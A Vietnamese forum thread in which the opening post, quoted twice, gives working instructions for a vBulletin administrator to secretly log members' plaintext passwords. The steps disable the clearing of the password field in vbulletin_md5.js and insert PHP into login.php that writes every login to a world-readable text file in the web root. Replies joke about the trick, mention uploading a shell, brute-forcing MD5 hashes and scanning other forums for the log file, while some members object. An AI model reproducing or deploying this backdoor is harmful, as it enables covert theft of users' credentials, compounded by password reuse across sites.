Nếu bạn là admin của 1 diễn đàn...bạn có thể tìm được pass của các thành viên trong diễn đàn của mình....cách làm như sau....

Mở file clientscript/vbulletin_md5.js
Thay dòng
input.value = ''; thành
//input.value = ''; Tiếp bạn mở file login.php
Tìm
if ($_POST['do'] == 'login')
{và chèn vào phía dưới
$fp = fopen("danhuongson.net.txt", "a+");

fwrite($fp, "Username: {$_POST['vb_login_username']}
Password: {$_POST['vb_login_password']}

");

rewind($fp);Cuối cùng tạo file danhuongson.net.txt và CHMOD 777 và upload lên root của forum...(ngang hàng với index.php)

Xong rùi...giờ ngồi đợi các mem login thui..kết quả sẽ được lưu lại trong file danhuongson.net.txt :D

Cho nên nếu bạn là admin của room nào đó thì tuyệt đối không đặt pass ở diễn đàn khác giống diễn đàn mình nhé....:D
Tham khảo từ hva

nếu là member thì có cách nào lấy đựoc pass của hội nó ko,của admin chẳng hạn.

hack thì hack được...nhưng mà học để hack được như thế e dài dài....:-s

Admin quản lý toàn bộ diễn đàn, cần gì phải hack pass hả bạn, theo mình nghĩ, ko cần hack pass admin vẫn có thể xem được password của thành viên.

uh đúng đấy,hack cau cac mem làm gi,bày cách hack của adim có hay hơn ko.

Admin quản lý toàn bộ diễn đàn, cần gì phải hack pass hả bạn, theo mình nghĩ, ko cần hack pass admin vẫn có thể xem được password của thành viên.
Admin thì có thể xem đc password nhưng pass của member bị mã hoá dưới dạng MD5 chứ ko phải là dạng ký tự :) . Thực ra là Admin muốn truy cập vào user của member đơn giản thôi, chỉ cần vào phpmyadmin rồi copy đoạn Md5 của mình hoặc dùng phần mềm dịch MD5, edit user muốn vào là xong :) .

Admin quản lý toàn bộ diễn đàn, cần gì phải hack pass hả bạn, theo mình nghĩ, ko cần hack pass admin vẫn có thể xem được password của thành viên.
quản lí toàn bộ đâu có xem được bạn...chỉ đổi được thôi...:D

Admin thì có thể xem đc password nhưng pass của member bị mã hoá dưới dạng MD5 chứ ko phải là dạng ký tự :) . Thực ra là Admin muốn truy cập vào user của member đơn giản thôi, chỉ cần vào phpmyadmin rồi copy đoạn Md5 của mình hoặc dùng phần mềm dịch MD5, edit user muốn vào là xong :) .
mình chỉ nói cái cách đơn giản nhất ấy thôi...:D
làm như cách trên bất cứ nick nào đăng nhập nó cũng lưu lại trong đó...cần thì mở file txt đó ra xem và search...:))

Có đúng như mọi người nói vậy không? Nếu đúng vậy thì có lẽ đây là lần đăng nhập cuối cùng của mình trên forum!

=)) ý tưởng độc đáo thật

admin log pass của mem

roai` pó tay thiệt ! đúng là ngộ nghĩnh thiệt !:)):))

hơ hơ...
hoàn toàn bình thường đó chớ...
chỉ cần cách này...
là tha hồ bít mật khẩu các mem....=))
mà thường thì họ đặt mật khẩu ở mọi nơi giống nhau hết....=))

bác này xem ra pro nhỉ? k pít là ý tưởng hay là.... 8-x 8-x 8-x

1. nếu mem muốn biết pass admin thì cũng có nhiều cách:
+ hỏi admin xem pass là gì
+ local hack, up shell lên host rồi by pass
+ ......
2. nếu là admin có thể xem được user và pass của các mem chứ ko chỉ đổi được ko đâu .
^^ hi hi
3. admin chẳng bao giờ log vào nick mem làm gì ;))

1. nếu mem muốn biết pass admin thì cũng có nhiều cách:
+ hỏi admin xem pass là gì
+ local hack, up shell lên host rồi by pass
+ ......
2. nếu là admin có thể xem được user và pass của các mem chứ ko chỉ đổi được ko đâu .
^^ hi hi
3. admin chẳng bao giờ log vào nick mem làm gì ;))
2. admin có thể đổi pass của mem nhưng không thể xem được pass, có thể vào CSDL để xem pass đã encode MD5 nhưng đây là dạng encode 1 chiều không thể decode được.

@lovely boy: đó là làm nghịch chơi thế thui...nhưng đôi khi cũng được việc đấy....:)).....bít pass của người khác có phải là thỏa mãn trí tò mò ko chớ...:))...(mà thường thì người ta hay đặt pass ở mọi nơi giống nhau :D)...với lại cũng nói vs bác là ko xem được pass mem dễ như bác nói đâu...;)
@zinki: xem trong CSDL thì có thể ko được nhưng làm như em thì được đều đều....:D...nó ghi nhận từ mỗi khi nhập pass mà....:D

2. admin có thể đổi pass của mem nhưng không thể xem được pass, có thể vào CSDL để xem pass đã encode MD5 nhưng đây là dạng encode 1 chiều không thể decode được.
Vẫn crack được mà, dùng brute force đi, chỉ có điều sẽ tốn thời gian mà thôi.

Nếu bạn là admin của 1 diễn đàn...bạn có thể tìm được pass của các thành viên trong diễn đàn của mình....cách làm như sau....

Mở file clientscript/vbulletin_md5.js
Thay dòng
input.value = ''; thành
//input.value = ''; Tiếp bạn mở file login.php
Tìm
if ($_POST['do'] == 'login')
{và chèn vào phía dưới
$fp = fopen("danhuongson.net.txt", "a+");

fwrite($fp, "Username: {$_POST['vb_login_username']}
Password: {$_POST['vb_login_password']}

");

rewind($fp);Cuối cùng tạo file danhuongson.net.txt và CHMOD 777 và upload lên root của forum...(ngang hàng với index.php)

Xong rùi...giờ ngồi đợi các mem login thui..kết quả sẽ được lưu lại trong file danhuongson.net.txt :D

Cho nên nếu bạn là admin của room nào đó thì tuyệt đối không đặt pass ở diễn đàn khác giống diễn đàn mình nhé....:D
Tham khảo từ hva
Hay thật! Định làm loạn hết lên à?:( các admin biết cách này rùi sao??? chuyện gì sẽ xảy ra??? Loạn lên ngay :( Yêu cầu delete mục này nhé :(

Admin quản lý toàn bộ diễn đàn, cần gì phải hack pass hả bạn, theo mình nghĩ, ko cần hack pass admin vẫn có thể xem được password của thành viên.
Về forum thì mình ko biết rõ, nhưng các trang web bảo mật, có tình thương mại, thì phải có cơ chế là: Các admin ko được phép biết password của các thành viên, và password đó được mã hóa, ko ai biết cả.(Chỉ trừ trường hợp coder và admin có gì đó với nhau :D)(Càng web liên quan điến "Thương mại" thì càng phải bảo mật). Thường thì Admin có quyền vào mọi tài khoản với 1 pass mặc định hoặc với danh nghĩa admin mà thôi. Chứ trang web hay forum nào mà để cho admin xem được pass của các thành viên thì khá là nguy hiểm.

TÓm lại, đứa nào lên danhuongson.net mà thấy pass bị mất hay các tài khoản của mình có vấn đề thì mang dao chém thằng bópku nhé =))

Ổng này đỉnh cao thật. Định viết 1 cái script scan các forumn xem có file danhuongson.net.txt để chén đây. Hàng kủng :=))

mỳnh chơi game , thường njck game alf njck forrum
như TLBB chẳng hạn
admjn chưa chắc đã là người , phải nói thế nào nhỷ
có nhiều người điều hành
mà chỉ cần 1 admjn nào ý đồ xấu
thì chết người rồi
còn gì ?

ôi cha.....:(
chỉ giỡn chơi thui mà....:D
thế mới cho các bạn kinh nghiệm là những pass quan trọng thì đừng nên đặt giống các pass khác....:)

cái này cần thông báo cho admin